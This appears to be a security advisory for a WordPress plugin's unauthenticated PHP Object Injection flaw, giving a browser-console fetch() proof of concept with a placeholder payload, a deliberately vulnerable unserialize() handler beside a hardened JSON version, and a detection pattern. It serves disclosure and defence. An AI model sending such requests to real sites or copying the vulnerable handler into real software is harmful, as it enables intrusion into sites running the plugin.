Description

The plugin unserializes user input via an AJAX action available to unauthenticated users, allowing them to perform PHP Object Injection when a suitable gadget is present on the blog.
Run the below command in the developer console of the web browser while being on the blog unauthenticated:

```javascript
fetch("/wp-admin/admin-ajax.php", {
  "headers": { "content-type": "application/x-www-form-urlencoded" },
  "body": new URLSearchParams({ "action": "fdm_update_cart_item", "options": "data-to-unserialize" }),
  "method": "POST",
  "credentials": "include"
});
```
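The root cause described above is a handler that passes the `options` POST field straight to `unserialize()` on a `wp_ajax_nopriv_` hook. The following is an added example, not the plugin's own code: a hypothetical handler in the vulnerable shape next to a hardened version that takes JSON instead, validates the structure against an allow-list, and requires a nonce. The function names, the `fdm_cart` nonce action and the `item_id`/`quantity` fields are assumptions for illustration; only the AJAX action name and the `options` parameter come from the advisory.

```php
<?php
// Added example (hypothetical), not code from the affected plugin.

// VULNERABLE PATTERN (hypothetical): attacker-controlled string handed to unserialize().
// Any class on the site with __wakeup()/__destruct() side effects becomes a gadget.
function fdm_example_update_cart_item_vulnerable() {
    $raw  = isset( $_POST['options'] ) ? wp_unslash( $_POST['options'] ) : '';
    $cart = unserialize( $raw ); // objects of arbitrary classes are instantiated here
    wp_send_json_success( $cart );
}

// HARDENED (hypothetical): JSON transport, nonce check, allow-listed keys, coerced types.
function fdm_example_update_cart_item_hardened() {
    // Even for logged-out visitors a nonce ties the request to a page the site served.
    check_ajax_referer( 'fdm_cart', 'nonce' ); // 'fdm_cart' is an assumed nonce action

    $raw  = isset( $_POST['options'] ) ? wp_unslash( $_POST['options'] ) : '';
    $cart = json_decode( $raw, true ); // associative arrays only; no class instantiation

    if ( json_last_error() !== JSON_ERROR_NONE || ! is_array( $cart ) ) {
        wp_send_json_error( array( 'message' => 'Invalid cart data' ), 400 );
    }

    // Rebuild the structure from known keys instead of trusting what was sent.
    $clean = array(
        'item_id'  => isset( $cart['item_id'] ) ? absint( $cart['item_id'] ) : 0,
        'quantity' => isset( $cart['quantity'] ) ? max( 1, absint( $cart['quantity'] ) ) : 1,
    );

    if ( 0 === $clean['item_id'] ) {
        wp_send_json_error( array( 'message' => 'Unknown item' ), 400 );
    }

    wp_send_json_success( $clean );
}

// STOPGAP when the serialized format cannot be replaced immediately (PHP >= 7.0):
// refuse to instantiate any class, so object entries become __PHP_Incomplete_Class
// and gadget chains have nothing to run.
function fdm_example_safe_unserialize( $raw ) {
    $data = unserialize( $raw, array( 'allowed_classes' => false ) );
    return is_array( $data ) ? $data : array();
}

// Register the hardened handler for both authenticated and unauthenticated callers.
add_action( 'wp_ajax_fdm_update_cart_item', 'fdm_example_update_cart_item_hardened' );
add_action( 'wp_ajax_nopriv_fdm_update_cart_item', 'fdm_example_update_cart_item_hardened' );
```

The JSON path is the real fix: `json_decode( ..., true )` can only produce scalars and arrays, so no `__wakeup()` or `__destruct()` ever fires. The `allowed_classes => false` stopgap is useful while migrating stored data, but it still parses attacker-supplied serialized strings, so it should not be the final state. For detection, a `POST` to `admin-ajax.php` with `action=fdm_update_cart_item` whose `options` value contains a serialized object marker such as `O:` followed by a class name is the shape to alert on.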
| CPE | Name | Operator | Version |
|---|---|---|---|
| | | eq | 2.4.11 |